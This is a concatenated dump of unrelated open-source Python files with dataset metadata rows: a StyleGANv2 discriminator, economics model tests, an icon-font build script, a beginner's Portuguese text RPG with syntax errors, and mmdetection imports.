# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# code was heavily based on https://github.com/rosinality/stylegan2-pytorch
# MIT License
# Copyright (c) 2019 Kim Seonghyeon
import math
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from .builder import DISCRIMINATORS
from ...modules.equalized import EqualLinear, EqualConv2D
from ...modules.fused_act import FusedLeakyReLU
from ...modules.upfirdn2d import Upfirdn2dBlur
class ConvLayer(nn.Sequential):
def __init__(
self,
in_channel,
out_channel,
kernel_size,
downsample=False,
blur_kernel=[1, 3, 3, 1],
bias=True,
activate=True,
):
layers = []
if downsample:
factor = 2
p = (len(blur_kernel) - factor) + (kernel_size - 1)
pad0 = (p + 1) // 2
pad1 = p // 2
layers.append(Upfirdn2dBlur(blur_kernel, pad=(pad0, pad1)))
stride = 2
self.padding = 0
else:
stride = 1
self.padding = kernel_size // 2
layers.append(
EqualConv2D(
in_channel,
out_channel,
kernel_size,
padding=self.padding,
stride=stride,
bias=bias and not activate,
))
if activate:
layers.append(FusedLeakyReLU(out_channel, bias=bias))
super().__init__(*layers)
class ResBlock(nn.Layer):
def __init__(self, in_channel, out_channel, blur_kernel=[1, 3, 3, 1]):
super().__init__()
self.conv1 = ConvLayer(in_channel, in_channel, 3)
self.conv2 = ConvLayer(in_channel, out_channel, 3, downsample=True)
self.skip = ConvLayer(in_channel,
out_channel,
1,
downsample=True,
activate=False,
bias=False)
def forward(self, input):
out = self.conv1(input)
out = self.conv2(out)
skip = self.skip(input)
out = (out + skip) / math.sqrt(2)
return out
# temporally solve pow double grad problem
def var(x, axis=None, unbiased=True, keepdim=False, name=None):
u = paddle.mean(x, axis, True, name)
out = paddle.sum((x - u) * (x - u), axis, keepdim=keepdim, name=name)
n = paddle.cast(paddle.numel(x), x.dtype) \
/ paddle.cast(paddle.numel(out), x.dtype)
if unbiased:
one_const = paddle.ones([1], x.dtype)
n = paddle.where(n > one_const, n - 1., one_const)
out /= n
return out
@DISCRIMINATORS.register()
class StyleGANv2Discriminator(nn.Layer):
def __init__(self, size, channel_multiplier=2, blur_kernel=[1, 3, 3, 1]):
super().__init__()
channels = {
4: 512,
8: 512,
16: 512,
32: 512,
64: 256 * channel_multiplier,
128: 128 * channel_multiplier,
256: 64 * channel_multiplier,
512: 32 * channel_multiplier,
1024: 16 * channel_multiplier,
}
convs = [ConvLayer(3, channels[size], 1)]
log_size = int(math.log(size, 2))
in_channel = channels[size]
for i in range(log_size, 2, -1):
out_channel = channels[2**(i - 1)]
convs.append(ResBlock(in_channel, out_channel, blur_kernel))
in_channel = out_channel
self.convs = nn.Sequential(*convs)
self.stddev_group = 4
self.stddev_feat = 1
self.final_conv = ConvLayer(in_channel + 1, channels[4], 3)
self.final_linear = nn.Sequential(
EqualLinear(channels[4] * 4 * 4,
channels[4],
activation="fused_lrelu"),
EqualLinear(channels[4], 1),
)
def forward(self, input):
out = self.convs(input)
batch, channel, height, width = out.shape
group = min(batch, self.stddev_group)
stddev = out.reshape((group, -1, self.stddev_feat,
channel // self.stddev_feat, height, width))
stddev = paddle.sqrt(var(stddev, 0, unbiased=False) + 1e-8)
stddev = stddev.mean([2, 3, 4], keepdim=True).squeeze(2)
stddev = stddev.tile((group, 1, height, width))
out = paddle.concat([out, stddev], 1)
out = self.final_conv(out)
out = out.reshape((batch, -1))
out = self.final_linear(out)
return out
| 29.350575 | 77 | 0.574114 |
74c05c62bfd4ff7e339c65e80af8369cb9254fef | 2,593 | py | Python | tests/base/test_options.py | gboehl/sequence-jacobian | 01d177cc254a2ccee57a3ed273117bea58554be2 | [
"MIT"
] | null | null | null | tests/base/test_options.py | gboehl/sequence-jacobian | 01d177cc254a2ccee57a3ed273117bea58554be2 | [
"MIT"
] | null | null | null | tests/base/test_options.py | gboehl/sequence-jacobian | 01d177cc254a2ccee57a3ed273117bea58554be2 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from sequence_jacobian.examples import krusell_smith
def test_jacobian_h(krusell_smith_dag):
_, ss, dag, *_ = krusell_smith_dag
hh = dag['hh']
lowacc = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, h=0.05)
midacc = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, h=1E-3)
usual = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, h=1E-4)
nooption = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10)
assert np.array_equal(usual['C','r'], nooption['C','r'])
assert np.linalg.norm(usual['C','r'] - midacc['C','r']) < np.linalg.norm(usual['C','r'] - lowacc['C','r'])
midacc_alt = hh.jacobian(ss, inputs=['r'], outputs=['C'], T=10, options={'hh': {'h': 1E-3}})
assert np.array_equal(midacc['C', 'r'], midacc_alt['C', 'r'])
lowacc = dag.jacobian(ss, inputs=['K'], outputs=['C'], T=10, options={'hh': {'h': 0.05}})
midacc = dag.jacobian(ss, inputs=['K'], outputs=['C'], T=10, options={'hh': {'h': 1E-3}})
usual = dag.jacobian(ss, inputs=['K'], outputs=['C'], T=10, options={'hh': {'h': 1E-4}})
assert np.linalg.norm(usual['C','K'] - midacc['C','K']) < np.linalg.norm(usual['C','K'] - lowacc['C','K'])
def test_jacobian_steady_state(krusell_smith_dag):
dag = krusell_smith_dag[2]
calibration = {"eis": 1, "delta": 0.025, "alpha": 0.11, "rho": 0.966, "sigma": 0.5,
"L": 1.0, "nS": 2, "nA": 10, "amax": 200, "r": 0.01, 'beta': 0.96,
"Z": 0.85, "K": 3.}
pytest.raises(ValueError, dag.steady_state, calibration, options={'hh': {'backward_maxit': 10}})
ss1 = dag.steady_state(calibration)
ss2 = dag.steady_state(calibration, options={'hh': {'backward_maxit': 100000}})
assert ss1['A'] == ss2['A']
def test_steady_state_solution(krusell_smith_dag):
dag_ss, ss, *_ = krusell_smith_dag
calibration = {'eis': 1.0, 'delta': 0.025, 'alpha': 0.11, 'rho': 0.966, 'sigma': 0.5,
'Y': 1.0, 'L': 1.0, 'nS': 2, 'nA': 10, 'amax': 200, 'r': 0.01}
unknowns_ss = {'beta': (0.98 / 1.01, 0.999 / 1.01)}
targets_ss = {'asset_mkt': 0.}
# less accurate solution
ss2 = dag_ss.solve_steady_state(calibration, unknowns_ss, targets_ss, solver="brentq",
ttol=1E-2, ctol=1E-2)
assert not np.isclose(ss['asset_mkt'], ss2['asset_mkt'])
# different solution method (Newton needs other inputs)
with pytest.raises(ValueError):
ss3 = dag_ss.solve_steady_state(calibration, unknowns_ss, targets_ss,
solver="newton")
| 43.949153 | 110 | 0.576552 |
3bd29e6a9a3c3115b29c7865ac3245a673a7b68b | 9,429 | py | Python | builder/generate.py | Acidburn0zzz/ionicons | d99d7f98b918f1679ff3f07d0e95a0300a1aa493 | [
"MIT"
] | null | null | null | builder/generate.py | Acidburn0zzz/ionicons | d99d7f98b918f1679ff3f07d0e95a0300a1aa493 | [
"MIT"
] | null | null | null | builder/generate.py | Acidburn0zzz/ionicons | d99d7f98b918f1679ff3f07d0e95a0300a1aa493 | [
"MIT"
] | null | null | null | from subprocess import call
import os
import json
BUILDER_PATH = os.path.dirname(os.path.abspath(__file__))
ROOT_PATH = os.path.join(BUILDER_PATH, '..')
FONTS_FOLDER_PATH = os.path.join(ROOT_PATH, 'fonts')
CSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'css')
SCSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'scss')
LESS_FOLDER_PATH = os.path.join(ROOT_PATH, 'less')
def main():
generate_font_files()
data = get_build_data()
rename_svg_glyph_names(data)
generate_scss(data)
generate_less(data)
generate_cheatsheet(data)
generate_component_json(data)
generate_composer_json(data)
generate_bower_json(data)
def generate_font_files():
print "Generate Fonts"
cmd = "fontforge -script %s/scripts/generate_font.py" % (BUILDER_PATH)
call(cmd, shell=True)
def rename_svg_glyph_names(data):
# hacky and slow (but safe) way to rename glyph-name attributes
svg_path = os.path.join(FONTS_FOLDER_PATH, 'ionicons.svg')
svg_file = open(svg_path, 'r+')
svg_text = svg_file.read()
svg_file.seek(0)
for ionicon in data['icons']:
# uniF2CA
org_name = 'uni%s' % (ionicon['code'].replace('0x', '').upper())
ion_name = 'ion-%s' % (ionicon['name'])
svg_text = svg_text.replace(org_name, ion_name)
svg_file.write(svg_text)
svg_file.close()
def generate_less(data):
print "Generate LESS"
font_name = data['name']
font_version = data['version']
css_prefix = data['prefix']
variables_file_path = os.path.join(LESS_FOLDER_PATH, '_ionicons-variables.less')
icons_file_path = os.path.join(LESS_FOLDER_PATH, '_ionicons-icons.less')
d = []
d.append('/*!');
d.append('Ionicons, v%s' % (font_version) );
d.append('Created by Ben Sperry for the Ionic Framework, http://ionicons.com/');
d.append('https://twitter.com/benjsperry https://twitter.com/ionicframework');
d.append('MIT License: https://github.com/driftyco/ionicons');
d.append('*/');
d.append('// Ionicons Variables')
d.append('// --------------------------\n')
d.append('@ionicons-font-path: "../fonts";')
d.append('@ionicons-font-family: "%s";' % (font_name) )
d.append('@ionicons-version: "%s";' % (font_version) )
d.append('@ionicons-prefix: %s;' % (css_prefix) )
d.append('')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('@ionicon-var-%s: "%s";' % (ionicon['name'], chr_code) )
f = open(variables_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
d = []
d.append('// Ionicons Icons')
d.append('// --------------------------\n')
group = [ '.%s' % (data['name'].lower()) ]
for ionicon in data['icons']:
group.append('.@{ionicons-prefix}%s' % (ionicon['name']) )
d.append( ',\n'.join(group) )
d.append('{')
d.append(' &:extend(.ion);')
d.append('}')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('.@{ionicons-prefix}%s:before { content: @ionicon-var-%s; }' % (ionicon['name'], ionicon['name']) )
f = open(icons_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
def generate_scss(data):
print "Generate SCSS"
font_name = data['name']
font_version = data['version']
css_prefix = data['prefix']
variables_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-variables.scss')
icons_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-icons.scss')
d = []
d.append('// Ionicons Variables')
d.append('// --------------------------\n')
d.append('$ionicons-font-path: "../fonts" !default;')
d.append('$ionicons-font-family: "%s" !default;' % (font_name) )
d.append('$ionicons-version: "%s" !default;' % (font_version) )
d.append('$ionicons-prefix: %s !default;' % (css_prefix) )
d.append('')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('$ionicon-var-%s: "%s";' % (ionicon['name'], chr_code) )
f = open(variables_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
d = []
d.append('// Ionicons Icons')
d.append('// --------------------------\n')
group = [ '.%s' % (data['name'].lower()) ]
for ionicon in data['icons']:
group.append('.#{$ionicons-prefix}%s' % (ionicon['name']) )
d.append( ',\n'.join(group) )
d.append('{')
d.append(' @extend .ion;')
d.append('}')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('.#{$ionicons-prefix}%s:before { content: $ionicon-var-%s; }' % (ionicon['name'], ionicon['name']) )
f = open(icons_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
generate_css_from_scss(data)
def generate_css_from_scss(data):
print "Generate CSS From SCSS"
scss_file_path = os.path.join(SCSS_FOLDER_PATH, 'ionicons.scss')
css_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.css')
css_min_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.min.css')
cmd = "sass %s %s --style compact" % (scss_file_path, css_file_path)
call(cmd, shell=True)
print "Generate Minified CSS From SCSS"
cmd = "sass %s %s --style compressed" % (scss_file_path, css_min_file_path)
call(cmd, shell=True)
def generate_cheatsheet(data):
print "Generate Cheatsheet"
cheatsheet_file_path = os.path.join(ROOT_PATH, 'cheatsheet.html')
template_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'template.html')
icon_row_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'icon-row.html')
f = open(template_path, 'r')
template_html = f.read()
f.close()
f = open(icon_row_path, 'r')
icon_row_template = f.read()
f.close()
content = []
for ionicon in data['icons']:
css_code = ionicon['code'].replace('0x', '\\')
escaped_html_code = ionicon['code'].replace('0x', '&#x') + ';'
html_code = ionicon['code'].replace('0x', '&#x') + ';'
item_row = icon_row_template
item_row = item_row.replace('{{name}}', ionicon['name'])
item_row = item_row.replace('{{prefix}}', data['prefix'])
item_row = item_row.replace('{{css_code}}', css_code)
item_row = item_row.replace('{{escaped_html_code}}', escaped_html_code)
item_row = item_row.replace('{{html_code}}', html_code)
content.append(item_row)
template_html = template_html.replace("{{font_name}}", data["name"])
template_html = template_html.replace("{{font_version}}", data["version"])
template_html = template_html.replace("{{icon_count}}", str(len(data["icons"])) )
template_html = template_html.replace("{{content}}", '\n'.join(content) )
f = open(cheatsheet_file_path, 'w')
f.write(template_html)
f.close()
def generate_component_json(data):
print "Generate component.json"
d = {
"name": data['name'],
"repo": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"version": data['version'],
"keywords": [],
"dependencies": {},
"development": {},
"license": "MIT",
"styles": [
"css/%s.css" % (data['name'].lower())
],
"fonts": [
"fonts/%s.eot" % (data['name'].lower()),
"fonts/%s.svg" % (data['name'].lower()),
"fonts/%s.ttf" % (data['name'].lower()),
"fonts/%s.woff" % (data['name'].lower())
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
component_file_path = os.path.join(ROOT_PATH, 'component.json')
f = open(component_file_path, 'w')
f.write(txt)
f.close()
def generate_composer_json(data):
print "Generate composer.json"
d = {
"name": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"homepage": "http://ionicons.com/",
"authors": [
{
"name": "Ben Sperry",
"email": "ben@drifty.com",
"role": "Designer",
"homepage": "https://twitter.com/benjsperry"
},
{
"name": "Adam Bradley",
"email": "adam@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/adamdbradley"
},
{
"name": "Max Lynch",
"email": "max@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/maxlynch"
}
],
"extra": {},
"license": [ "MIT" ]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
composer_file_path = os.path.join(ROOT_PATH, 'composer.json')
f = open(composer_file_path, 'w')
f.write(txt)
f.close()
def generate_bower_json(data):
print "Generate bower.json"
d = {
"name": data['name'],
"version": data['version'],
"homepage": "https://github.com/driftyco/ionicons",
"authors": [
"Ben Sperry <ben@drifty.com>",
"Adam Bradley <adam@drifty.com>",
"Max Lynch <max@drifty.com>"
],
"description": "Ionicons - free and beautiful icons from the creators of Ionic Framework",
"main": [
"css/%s.css" % (data['name'].lower()),
"fonts/*"
],
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"license": "MIT",
"ignore": [
"**/.*",
"builder",
"node_modules",
"bower_components",
"test",
"tests"
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
bower_file_path = os.path.join(ROOT_PATH, 'bower.json')
f = open(bower_file_path, 'w')
f.write(txt)
f.close()
def get_build_data():
build_data_path = os.path.join(BUILDER_PATH, 'build_data.json')
f = open(build_data_path, 'r')
data = json.loads(f.read())
f.close()
return data
if __name__ == "__main__":
main()
| 29.557994 | 113 | 0.617033 |
ba50c8bbafa0140b7cc9f1f2facafba5fbda8afa | 15,083 | py | Python | Text RPG project/projeto RPG texto.py | Hipparcus/Python-Learning | a3bd5787ceb67f20a0a053e3db4cf77a18e12112 | [
"MIT"
] | null | null | null | Text RPG project/projeto RPG texto.py | Hipparcus/Python-Learning | a3bd5787ceb67f20a0a053e3db4cf77a18e12112 | [
"MIT"
] | null | null | null | Text RPG project/projeto RPG texto.py | Hipparcus/Python-Learning | a3bd5787ceb67f20a0a053e3db4cf77a18e12112 | [
"MIT"
] | null | null | null | #Prototipo#
def RPG():
nome=input("Qual nome de seu personagem? ")
raca=input("Qual sua raca entre humano, orc ou elfo?: ")
raca=str.lower(raca)
if raca=="orc":
introd="Bem-vindo, caro orc "+ nome+". Gostariamos de saber qual sera a sua classe preferida? Tenha em mente que nao eh necessario se apegar as armas de sua classe de origem (mas elas terao dano maximo se forem)."
print (introd)
classe=input("Qual sua classe?: ")
return "Boa escola caro, " + classe
elif raca=="elfo":
introd="Bem vindo majestade "+nome+", As florestas elficas precisam de sua ajuda mas primeiro voce precisa especificar sua classe de batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem."
print (introd)
classe=raw_input("Qual sua classe?: ")
return "Otima escolha majestade... ou melhor dizendo, " + classe
elif raca=="humano":
introd="Bem vindo "+nome+" camarada! Precisamos de sua ajuda nos campos de batalha ao norte de Nahteru. Os orcs estao nos massacrando e os elfos nao parecem tao amistosos quanto antigamente... enfim, escolha sua classe para irmos logo a batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem!"
print (introd)
classe=raw_input("Qual sua classe?: ")
return "Otima escolha "+ classe+ "! Agora junte-se a nos. Treine um pouco para nao morrer rapido demais... HAHAHA"
else:
return "Esta raca nao existe. Por favor escolha uma raca valida."
#############################################################
import cmd
import textwrap
import sys
import os
import time
import random
screen_width=100
def cls(): #call clear
os.system('cls' if os.name=='nt' else 'clear')
##Player Setup##
class player:
def __init__(self):
self.name=''
self.hp=0
self.mp=0
self.status_effects=[]
self.location="start"
myPlayer=player()
######Tela inicial#########
def title_screen_selections():
option=input("> ")
if option.lower()==('jogar'):
start_game()
elif option.lower()==('ajuda'):
help_menu()
elif option.lower()==('sair'):
sys.exit()
while option.lower() not in ['jogar', 'ajuda' , 'sair']:
print ("Por favor escolha uma opcao válida!")
option=input("> ")
if option.lower()==('Jogar'):
start_game()
elif option.lower()==('Ajuda'):
help_menu()
elif option.lower()==('Sair'):
sys.exit()
def main(): #title_screen
print ("#############################")
print ("Bem-vindo à Dragons Fury!!")
print ("#############################")
print (" ~Jogar~ ")
print (" ~Ajuda~ ")
print (" ~Sair~ ")
title_screen_selections()
def help_menu():
print ("###############")
print (" -Faca suas escolhas digitando-as!")
print (" -Este game tem uma historia propria dependendo de qual raca foi escolhida ")
print (" voce pode escolher o modo em que as historias irao terminar!")
print ("O jogo eh apenas um pequeno projeto de um iniciante em programacao entao nao serao historias muito longas.")
print ("Suas escolhas nao impactarao necessariamente o final das historias mas haverao situacoes diferentes com que voce ira enfrentar no meio do caminho (estas sim dependentes de suas escolhas)")
print (" -O sistema de batalha funciona como um RPG de mesa onde usa-se dados(ou seja, numeros aleatorios) somando-as com o status de seu personagem.")
print(" -Podes escolher a classe que quiser mas se não existir dentro do jogo seu item inicial sera apenas equipamentos basicos: adaga inicial e armadura de couro.")
print (" -As classes existentes são: Guerreiro, Espadachim, Gladiador, Barbaro, Paladino, Arqueiro, Cacador, Ninja, Samurai, Lutador, Monge, Curandeiro, Mago, Bruxo, Feiticeiro, Mago, Druida, Xama, Sentinela, Guardiao")
print (" Digite -DESCRICAO,EXAMINACAO, UP,DOWN, LEFT, RIGHT para interagir c o mapa")
print (" -Boa sorte e divirta-se!")
print ("###############")
title_screen_selections()
#Funcionalidades do game
def start_game():
nome=input("Qual nome de seu personagem? ")
raca=input("Qual sua raca entre humano, orc ou elfo?: ")
raca=str.lower(raca)
if raca=="orc":
introd="Bem-vindo, caro orc "+ nome+". Gostariamos de saber qual sera a sua classe preferida? Tenha em mente que nao eh necessario se apegar as armas de sua classe de origem (mas elas terao dano maximo se forem)."
print (introd)
classe=input("Qual sua classe?: ")
print ("Boa escola caro, " + classe)
classe_armainicial(classe)
elif raca=="elfo":
introd="Bem vindo majestade "+nome+", As florestas elficas precisam de sua ajuda mas primeiro voce precisa especificar sua classe de batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem."
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha majestade... ou melhor dizendo, " + classe)
classe_armainicial(classe)
elif raca=="humano":
introd="Bem vindo "+nome+" camarada! Precisamos de sua ajuda nos campos de batalha ao norte de Nahteru. Os orcs estao nos massacrando e os elfos nao parecem tao amistosos quanto antigamente... enfim, escolha sua classe para irmos logo a batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem!"
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha "+ classe+ "! Agora junte-se a nos. Treine um pouco para nao morrer rapido demais... HAHAHA")
classe_armainicial(classe)
while raca not in ['orc', 'humano' , 'elfo']:
print ("Por favor escolha uma opcao válida!")
raca=input("Qual sua raca entre humano, orc ou elfo?: ")
raca=str.lower(raca)
if raca=="orc":
introd="Bem-vindo, caro orc "+ nome+". Gostariamos de saber qual sera a sua classe preferida? Tenha em mente que nao eh necessario se apegar as armas de sua classe de origem (mas elas terao dano maximo se forem)."
print (introd)
classe=input("Qual sua classe?: ")
print ("Boa escolha caro, " + classe)
classe_armainicial(classe)
elif raca=="elfo":
introd="Bem vindo majestade "+nome+", As florestas elficas precisam de sua ajuda mas primeiro voce precisa especificar sua classe de batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem."
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha majestade... ou melhor dizendo, " + classe)
classe_armainicial(classe)
elif raca=="humano":
introd="Bem vindo "+nome+" camarada! Precisamos de sua ajuda nos campos de batalha ao norte de Nahteru. Os orcs estao nos massacrando e os elfos nao parecem tao amistosos quanto antigamente... enfim, escolha sua classe para irmos logo a batalha! Tenha em mente que podes usar armas de diferentes classes mas seu dano sera total apenas em sua classe de origem!"
print (introd)
classe=input("Qual sua classe?: ")
print ("Otima escolha "+ classe+ "! Agora junte-se a nos. Treine um pouco para nao morrer rapido demais... HAHAHA")
classe_armainicial(classe)
print_location()
def classe_armainicial(classe):
if str.lower(classe) in ['guerreiro','espadachin','espadachim','gladiador','barbaro','paladino']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e uma -espada de ferro inicial!")
elif str.lower(classe) in ['arqueiro','atirador','cacador']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura leve e um -arco simples inicial!")
elif str.lower(classe) in ['ninja','samurai']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e uma -katana de ferro inicial!")
elif str.lower(classe) in ['lutador','monje','monge']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e uma -Luva de ferro pontiagudo inicial!")
elif str.lower(classe) in ['curandeiro','mago','bruxo','healer','feiticeira','feiticeiro','maga','bruxa']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente um chapéu leve de feitico e um -Cajado magico inicial!")
elif str.lower(classe)in['druida','xama','sentinela','guardiao']:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura media e um -machadinho de ferro inicial!")
else:
print ("Agora, ja que es "+classe+" voce vai receber inicialmente uma armadura de couro e uma -adaga inicial!")
###########Mapa##########
#player starts at b2
ZONENAME=' '
DESCRICAO = 'descricao'
EXAMINACAO = 'examinar'
SOLVED=False
UP='up','norte','north','cima','norte'
DOWN='down','south','baixo','sul'
LEFT='left','west','esquerda','oeste'
RIGHT='right','east','direita','leste'
solved_places={'a1':False,'a2':False,'a3':False,'a4':False,
'b1':False,'b2':False,'b3':False,'b4':False,
'c1':False,'c2':False,'c3':False,'c4':False}
zonemap={
'a1':{
ZONENAME: "Zona de treinamento",
DESCRICAO== 'Onde podes aprender como funciona o sistema de batalha e conseguir missoes extras'
EXAMINACAO == 'Todos parecem muito focados em melhorar...'
SOLVED=False
UP=''
DOWN='b1'
LEFT=''
RIGHT='a2'
}
'a2':{
ZONENAME: "Rua 120-t",
DESCRICAO = 'liga Zona de treinamento ao Quartel'
EXAMINACAO = 'a rua parece a mesma de sempre'
SOLVED=False
UP=''
DOWN='b2'
LEFT='a1'
RIGHT='a3'
}
'a3':{
ZONENAME: "Quartel",
DESCRICAO = 'Aqui onde o general do batalhao se encontra na maioria das vezes. Importantes missoes sao dadas aqui'
EXAMINACAO = 'Aqui anda bem movimento...como sempre'
SOLVED=False
UP=''
DOWN='b3'
LEFT='a2'
RIGHT='a4'
}
'a4':{
ZONENAME: "Floresta",
DESCRICAO = 'Uma floresta normal ao lado do quartel'
EXAMINACAO = 'As arvores estao lindas essa epoca do ano...'
SOLVED=False
UP=''
DOWN='b4'
LEFT='a3'
RIGHT=''
}
'b1':{
ZONENAME: "",
DESCRICAO = 'descricao'
EXAMINACAO = 'examinar'
SOLVED=False
UP='a1'
DOWN='c1'
LEFT=''
RIGHT='b2'
}
'b2':{
ZONENAME: 'Casa',
DESCRICAO = 'Aqui eh onde voce mora...por enquanto,'
EXAMINACAO = 'Sua casa parece a mesma coisa de sempre'
SOLVED=False
UP='a2'
DOWN='c2'
LEFT='b1'
RIGHT='b3'
}
'b3':{
ZONENAME: "Vizinho",
DESCRICAO = 'Nao conheco muito os vizinhos... mas parecem pessoas legais'
EXAMINACAO = 'Examinar a casa dos outros eh meio...esquesito'
SOLVED=False
UP='a3'
DOWN='c3'
LEFT='b2'
RIGHT='b4'
}
'b4':{
ZONENAME: "Floresta",
DESCRICAO = 'Uma floresta normal ao lado do quartel'
EXAMINACAO = 'As arvores estao lindas essa epoca do ano...'
SOLVED=False
UP='a4'
DOWN='c4'
LEFT='b3'
RIGHT=''
}
'c1':{
ZONENAME: "Saida da cidade principal",
DESCRICAO = 'Ao examinar aqui voce concorda em sair do local. Deseja mesmo sair?'
EXAMINACAO = 'Saindo'
SOLVED=False
UP='b1'
DOWN=''
LEFT=''
RIGHT='c2'
}
'c2':{
ZONENAME: "Portoes da cidade",
DESCRICAO = 'Aqui eh a entrada da cidade principal'
EXAMINACAO = 'Os portoes sempre abertos. Parece mesmo perigoso...'
SOLVED=False
UP='b2'
DOWN=''
LEFT='c1'
RIGHT='c3'
}
'c3':{
ZONENAME: "Rua principal",
DESCRICAO = 'O coracao da cidade'
EXAMINACAO = 'Seu vizinho fica logo a cima, mais em cima ha o Quartel. A esquerda fica os portoes e mais a esquerda a saida da cidade. Esquerda e pra cima voce chega em casa. Duas esquerdas e duas cima voce chega na zona de treinamento!'
SOLVED=False
UP='b3'
DOWN=''
LEFT='c2'
RIGHT='c4'
}
'c4':{
ZONENAME: "Trilha para a floresta",
DESCRICAO = 'A floresta esta logo a cima!'
EXAMINACAO = 'Lugar bem calmo'
SOLVED=False
UP='b4'
DOWN=''
LEFT='c3'
RIGHT=''
}
}
####Interatividade do Game########
def print_location():
print ('\n'+('#'*(4+len(myPlayer.location))))
print ('#' + myPlayer.location.upper()+'#')
print ('#'+zonemap[myPlayer.location][DESCRICAO]+'#')
print ('\n'+('#'*(4+len(myPlayer.location))))
def prompt():
print ("\n"+"=======================")
print ("Digite o que gostaria de fazer")
action=input("> ")
acceptable_actions=['mover','ir','viajar','inspecionar','interagir','descricao','olhar']
while action.lower() not in acceptable_actions:
print ("Acao desconhecida, tente novamente.\n")
action=input("> ")
if action.lower() == 'sair':
sys.exit()
elif action.lower() in ['mover','ir','viajar']:
player_move(action.lower())
elif action.lower() in ['inspecionar','interagir','descricao','olhar']:
player_examine(action.lower())
def player_move(myAction):
ask="Onde voce gostaria de ir? \n"
dest=input(ask)
if dest in ['up','norte','north','cima','norte']:
destination=zonemap[myPlayer,location][UP]
movement_handler(destination)
elif dest in ['left','west','esquerda','oeste']:
destination=zonemap[myPlayer.location][LEFT]
movement_handler(destination)
elif dest in ['down','south','baixo','sul']:
destination=zonemap[myPlayer.location][DOWN]
movement_handler(destination)
elif dest in ['right','east','direita','leste']:
destination=zonemap[myPlayer.location][RIGHT]
movement_handler(destination)
def movement_handler(destination):
print ("\n"+ "Voce se moveu para "+ destination)
myPlayer.location=destination
print_location()
def player_examine(action):
if zonemap[myPlayer.location][SOLVED]==True:
print ("Voce ja sabe tudo sobre aqui.")
else:
print ("Voce ainda pode fazer coisas por aqui.")
if __name__ == '__main__':
main()
| 40.114362 | 373 | 0.610555 |
84b6dc393cd509588c124b4cafe4a8a149433c2d | 422 | py | Python | mmdet/apis/__init__.py | XiaoyuHuang96/mmdetection | e2ff08b68e2f5907a59976dcedb055036c03eecf | [
"Apache-2.0"
] | null | null | null | mmdet/apis/__init__.py | XiaoyuHuang96/mmdetection | e2ff08b68e2f5907a59976dcedb055036c03eecf | [
"Apache-2.0"
] | null | null | null | mmdet/apis/__init__.py | XiaoyuHuang96/mmdetection | e2ff08b68e2f5907a59976dcedb055036c03eecf | [
"Apache-2.0"
] | null | null | null | from .env import get_root_logger, init_dist, set_random_seed
from .inference import (inference_detector, init_detector, show_result,
show_result_pyplot)
from .train import train_detector
from .myutils import OurRunner
__all__ = [
'init_dist', 'get_root_logger', 'set_random_seed', 'train_detector',
'init_detector', 'inference_detector', 'show_result', 'show_result_pyplot','OurRunner'
]
| 35.166667 | 90 | 0.746445 |
aaa9308bc6ca3de3fae08dad6e5631dd6aeb1655 | 2,096 | py | Python | pbx_gs_python_utils/Update_Lambda_Functions.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 3 | 2018-12-14T15:43:46.000Z | 2019-04-25T07:44:58.000Z | pbx_gs_python_utils/Update_Lambda_Functions.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
